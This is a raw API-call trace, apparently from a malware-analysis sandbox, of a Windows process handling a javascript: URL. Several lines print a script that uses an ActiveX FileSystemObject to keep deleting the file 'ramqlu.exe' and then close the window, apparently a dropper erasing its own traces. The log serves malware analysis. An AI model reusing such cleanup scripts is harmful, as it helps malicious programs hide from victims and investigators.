FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x2cf214 | out: ppvObject=0x2cf214*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x2cf210 | out: ppvObject=0x2cf210*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x2cf20c | out: ppvObject=0x2cf20c*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x2cf208 | out: ppvObject=0x2cf208*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf204 | out: ppvObject=0x2cf204*=0x2a52fc0) returned 0x0 [0074.262] FileSystemObject:IUnknown:Release (This=0x2a52fc0) returned 0x1 [0074.262] GetCurrentThreadId () returned 0x90 [0074.263] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.263] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f2a8 [0074.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x476e48 [0074.264] malloc (_Size=0x204) returned 0x2a51280 [0074.264] ??2@YAPAXI@Z () returned 0x2a51490 [0074.300] ??2@YAPAXI@Z () returned 0x2a51510 [0074.300] GetCurrentThreadId () returned 0x90 [0074.300] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.300] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f2f0 [0074.302] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fd08 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4708c8 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f338 [0074.302] SetTimer (hWnd=0x202ae, nIDEvent=0x2000, uElapse=0xa, lpTimerFunc=0x0) returned 0x2000 [0074.302] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0074.303] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0074.449] GetCurrentThreadId () returned 0x90 [0074.449] GetCurrentThreadId () returned 0x90 [0074.450] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0074.450] ??3@YAXPAX@Z () returned 0x1 [0074.450] free (_Block=0x2a511b0) [0074.450] GetCurrentThreadId () returned 0x90 [0074.450] GetCurrentThreadId () returned 0x90 [0074.454] GetProcAddress (hModule=0x76e40000, lpProcName=0x93) returned 0x76e44c28 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46fd28 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4708e0 [0074.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="4475597", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9) returned 0x4708f8 [0074.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="4475597", cchWideChar=-1, lpMultiByteStr=0x4708f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4475597", lpUsedDefaultChar=0x0) returned 8 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46fd48 [0074.454] GetProcessHeap () returned 0x410000 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613a0 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708e0 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708f8 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46c678 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd28 | out: hHeap=0x410000) returned 1 [0074.459] IInternetProtocol:Read (in: This=0x45435c, pv=0x4543e8, cb=0x800, pcbRead=0x2cf704 | out: pv=0x4543e8, pcbRead=0x2cf704*=0x8) returned 0x0 [0074.459] IInternetProtocol:Read (in: This=0x45435c, pv=0x4543f0, cb=0x7f8, pcbRead=0x2cf704 | out: pv=0x4543f0, pcbRead=0x2cf704*=0x0) returned 0x1 [0074.463] IBindStatusCallback:OnProgress (This=0x453428, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="text/html") returned 0x0 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.WINSOCK_ACTIVITY") returned 0xc0f7 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.SET_CONNECTOID_NAME") returned 0xc0f6 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.IEXPLORER_EXITING") returned 0xc0fb [0074.465] FindWindowW (lpClassName="MS_AutodialMonitor", lpWindowName=0x0) returned 0x0 [0074.465] FindWindowW (lpClassName="MS_WebCheckMonitor", lpWindowName=0x0) returned 0x1014c [0074.465] PostMessageW (hWnd=0x1014c, Msg=0xc0f7, wParam=0x0, lParam=0x0) returned 1 [0074.592] IBindCtx:GetObjectParam (in: This=0x4503c0, pszKey="__DWNBINDINFO", ppunk=0x2cf62c | out: ppunk=0x2cf62c*=0x0) returned 0x80004005 [0074.592] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc166 [0074.592] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc122 [0074.592] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc190 [0074.592] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc176 [0074.592] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc178 [0074.592] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc177 [0074.593] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc17c [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc17d [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc17e [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc180 [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc17f [0074.593] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc182 [0074.593] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc183 [0074.593] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc184 [0074.593] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc191 [0074.593] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc192 [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc17a [0074.593] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc17b [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc181 [0074.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fda8 [0074.593] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.593] StrCmpNICW (lpStr1="text/htm", lpStr2="text/css", nChar=8) returned 5 [0074.593] IInternetProtocol:Read (in: This=0x45435c, pv=0x455a10, cb=0x1ff8, pcbRead=0x2cf820 | out: pv=0x455a10, pcbRead=0x2cf820*=0x0) returned 0x1 [0074.593] IBindStatusCallback:OnProgress (This=0x453428, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x4, szStatusText="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0074.593] GetCurrentThreadId () returned 0x90 [0074.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x118) returned 0x457b50 [0074.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0074.594] MulDiv (nNumber=8, nNumerator=4000, nDenominator=8) returned 4000 [0074.594] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf7c0 | out: ppvObject=0x2cf7c0*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf7ac | out: ppvObject=0x2cf7ac*=0x0) returned 0x80004002 [0074.594] IBindStatusCallback:OnProgress (This=0x453428, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x6, szStatusText="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0074.594] GetCurrentThreadId () returned 0x90 [0074.594] IInternetProtocol:LockRequest (This=0x45435c, dwOptions=0x0) returned 0x0 [0074.594] IBindStatusCallback:RemoteOnDataAvailable (This=0x453428, grfBSCF=0x5, dwSize=0x8, pFormatetc=0x453ec4, pStgmed=0x43f9f8) returned 0x0 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3c8 | out: ppvObject=0x2ce3c8*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce380 | out: ppvObject=0x2ce380*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3c0 | out: ppvObject=0x2ce3c0*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce380 | out: ppvObject=0x2ce380*=0x0) returned 0x80004002 [0074.595] GetCurrentThreadId () returned 0x90 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x473658 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x476f78 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x470910 [0074.811] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0074.812] GetCurrentThreadId () returned 0x90 [0074.812] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200c) returned 0x4770a8 [0074.813] IInternetProtocol:Read (in: This=0x45435c, pv=0x4770bc, cb=0x1ff8, pcbRead=0x2cf6dc | out: pv=0x4770bc, pcbRead=0x2cf6dc*=0x0) returned 0x1 [0074.813] IInternetProtocol:Read (in: This=0x45435c, pv=0x4770bc, cb=0x1ff8, pcbRead=0x2cf6dc | out: pv=0x4770bc, pcbRead=0x2cf6dc*=0x0) returned 0x1 [0074.813] GetCurrentThreadId () returned 0x90 [0074.813] GetCurrentThreadId () returned 0x90 [0074.814] SetEvent (hEvent=0x150) returned 1 [0074.815] IBindStatusCallback:OnStopBinding (This=0x453428, hresult=0x0, szError=0x0) returned 0x0 [0074.815] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.815] IBinding:RemoteGetBindResult (in: This=0x455488, pclsidProtocol=0x2cf7f8, pdwResult=0x2cf7e8, pszResult=0x2cf7dc, dwReserved=0x0 | out: pclsidProtocol=0x2cf7f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x2cf7e8*=0x0, pszResult=0x2cf7dc*=0x0) returned 0x0 [0074.815] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf7f4 | out: pdwScheme=0x2cf7f4*=0xf) returned 0x0 [0074.816] GetCurrentThreadId () returned 0x90 [0074.816] GetCurrentThreadId () returned 0x90 [0074.816] SetEvent (hEvent=0x150) returned 1 [0074.816] CoTaskMemFree (pv=0x0) [0074.816] IInternetProtocolRoot:Terminate (This=0x45435c, dwOptions=0x0) returned 0x0 [0074.816] IUnknown:Release (This=0x4555f0) returned 0x4 [0074.816] ReleaseBindInfo (pbindinfo=0x454380) [0074.817] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0075.374] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0075.375] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0075.375] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0075.647] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0075.647] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0075.647] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x2ce1ec | out: ppURI=0x2ce1ec*=0x43bfcc) returned 0x0 [0075.648] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ce1c4 | out: ppvObject=0x2ce1c4*=0x43bfcc) returned 0x0 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x4 [0075.648] IUnknown:AddRef (This=0x43bfcc) returned 0x5 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x118) returned 0x457c78 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x4 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x3 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47a1e0 [0075.648] FindResourceW (hModule=0x73710000, lpName=0x1fe, lpType=0x6) returned 0x2e084d0 [0075.648] LoadResource (hModule=0x73710000, hResInfo=0x2e084d0) returned 0x2e2e53c [0075.648] LockResource (hResData=0x2e2e53c) returned 0x2e2e53c [0075.648] VirtualQuery (in: lpAddress=0x2e2e53c, lpBuffer=0x2cf394, dwLength=0x1c | out: lpBuffer=0x2cf394*(BaseAddress=0x2e2e000, AllocationBase=0x2b50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0075.648] SizeofResource (hModule=0x73710000, hResInfo=0x2e084d0) returned 0xe6 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200) returned 0x47a2e8 [0075.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a1e0 | out: hHeap=0x410000) returned 1 [0075.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457c78 | out: hHeap=0x410000) returned 1 [0075.648] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x47a2e8, Size=0x136) returned 0x47a2e8 [0075.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13a) returned 0x47a428 [0075.649] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf550 | out: ppu=0x2cf550) returned 0x0 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x4538e8 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f9f0 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x47a588 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x453918 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44fa48 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x68) returned 0x473780 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c2d8 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44faa0 [0075.650] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473780 | out: hHeap=0x410000) returned 1 [0075.650] GetSystemDefaultLCID () returned 0x409 [0075.650] GetVersionExW (in: lpVersionInformation=0x2cf420*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x410174, dwBuildNumber=0x45ca30, dwPlatformId=0x410000, szCSDVersion="㝸G") | out: lpVersionInformation=0x2cf420*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.650] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2cf3a0 | out: lpList=0x2cf3a0) returned 1 [0075.856] GetSystemMetrics (nIndex=4096) returned 0 [0075.856] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0075.856] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0075.856] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0075.856] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0075.856] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0075.856] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0075.856] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0075.856] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2c) returned 0x45c2a0 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44faf8 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x64) returned 0x473780 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x453948 [0076.604] SetTimer (hWnd=0x202a8, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.604] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.604] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf50c, dwFlags=0x0 | out: pdwZone=0x2cf50c*=0xffffffff) returned 0x800c0011 [0076.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0076.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0076.604] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0076.604] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x2106, pPolicy=0x2cf510, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf510*=0x0) returned 0x0 [0076.604] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x47a1e0 [0076.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.606] RedrawWindow (hWnd=0x202a8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0076.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a588 | out: hHeap=0x410000) returned 1 [0076.606] GetCurrentThreadId () returned 0x90 [0076.606] GetCurrentThreadId () returned 0x90 [0076.606] GetCurrentThreadId () returned 0x90 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x47a588 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64) returned 0x4737f0 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x47a970 [0076.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xdc) returned 0x46be68 [0076.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c268 [0076.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x250) returned 0x47aa68 [0076.609] LsGetRubyLsimethods () returned 0x0 [0076.609] LsGetTatenakayokoLsimethods () returned 0x0 [0076.609] LsGetHihLsimethods () returned 0x0 [0076.609] LsGetWarichuLsimethods () returned 0x0 [0076.609] LsGetReverseLsimethods () returned 0x0 [0076.609] LsCreateContext () returned 0x0 [0076.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x670) returned 0x47acc0 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x453978 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x468910 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x4539a8 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2e4) returned 0x47b338 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x46c678 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472190 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x47b628 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f380 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4721b8 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4721e0 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472208 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472230 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x400) returned 0x47b6d0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613c0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613d0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613e0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613f0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x47bad8 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x47bc08 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x47bd30 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x130) returned 0x47be40 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x468a28 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x278) returned 0x47bf78 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x47c1f8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x190) returned 0x47c2c8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x78) returned 0x422038 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x47c460 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x44fb50 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x194) returned 0x47c558 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x47c6f8 